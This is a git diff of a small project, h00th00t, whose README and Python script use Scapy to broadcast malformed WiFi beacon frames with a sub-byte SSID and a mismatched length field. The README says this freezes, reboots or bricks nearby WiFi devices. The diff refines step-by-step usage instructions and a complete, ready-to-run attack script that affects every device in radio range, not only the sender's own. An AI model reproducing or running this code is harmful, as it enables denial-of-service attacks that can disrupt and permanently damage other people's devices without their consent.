diff --git a/README.md b/README.md index cbb8d4c..8ef9fef 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,8 @@ # h00th00t ## Sub-Byte Binary Underflow in WiFi Devices ## Warning: Test With Extreme Care -### Summary +### Warning: USE AT YOUR OWN PERIL +## Summary Sending WiFi beacons where the SSID is set to some non-byte number of bits and a poorly matching SSID length breaks many random WiFi devices in range. Some devices freeze, some reboot, some break, some brick. @@ -19,10 +20,12 @@ Testing is very challenging as it requires being out of range of all other WiFi ## Hooting (usage) **DO NOT TEST IN RANGE OF ANY DEVICE YOU ARE UNWILLING TO DAMAGE** -1. Install [Scapy](https://scapy.readthedocs.io/en/latest/installation.html) -2. Uncomment line `19` of [h00thoot.py](./h00th00t.py) -3. `python h00th00t.py` - +1. Designed for **linux** environments with **python3** +2. Optional: edit line `4` and `5` of [h00thoot.py](./h00th00t.py) to match your sender and wifi device preferences + * Defaults are fine for most purposes +3. Install [Scapy](https://scapy.readthedocs.io/en/latest/installation.html) +4. Uncomment line `19` of [h00thoot.py](./h00th00t.py) +5. `python h00th00t.py` + * in some linux environments, sudo may be needed `sudo python h00th00t.py` --- - ![Stolas uwu~](./stolas-headdesk.gif) \ No newline at end of file diff --git a/h00th00t.py b/h00th00t.py index 0b6e6a8..98c88f5 100644 --- a/h00th00t.py +++ b/h00th00t.py @@ -1,19 +1,30 @@ from scapy.all import * # config your stuff here -iface = 'wlan1' -sender = RandMAC() +iface = 'wlan0' +sender_bssid_mac = RandMAC() # used for source mac and bssid # send raw wifi beacon frames -def beacon_raw(SSID, length=255): - dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=RandMAC(), addr3=RandMAC()) - beacon = Dot11Beacon() - essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) - frame = RadioTap()/dot11/beacon/essid +## USAGE: +### beacon_raw(, , ) +### or +### beacon_raw(SSID=, reported_length=, interval_seconds=) +## DEFAULTS: +### SSID="DUMMY SSID" +### reported_length=255 +### interval_seconds=0.250 +def beacon_raw(SSID="DUMMY SSID", reported_length=255, interval_seconds=0.250): + # addr1 is destination (broadcast), addr2 is the source mac, addr3 is the bssid + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender_bssid_mac, addr3=sender_bssid_mac) # set the frame settings + beacon = Dot11Beacon() # create the beacon + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=reported_length) # magic really happens here with Scapy's RawVal() function and the reported_length + frame = RadioTap()/dot11/beacon/essid # assemble the frame + print("FIRIN MY LAZORRRRRR") - sendp(frame, iface=iface, inter=0.250, loop=1) + sendp(frame, iface=iface, inter=interval_seconds, loop=1) # send on loop +# this can be most any value really experimentation is needed ssid_binary = 0b0101 # a few random bits to send as the SSID -# please be careful with this, it can crash your local wifi devices -# beacon_raw(ssid_binary, length=255) # send it \ No newline at end of file +# please be careful with this, it can crash or damage your local wifi devices +# beacon_raw(ssid_binary) # send it! USE WITH EXTREME CARE \ No newline at end of file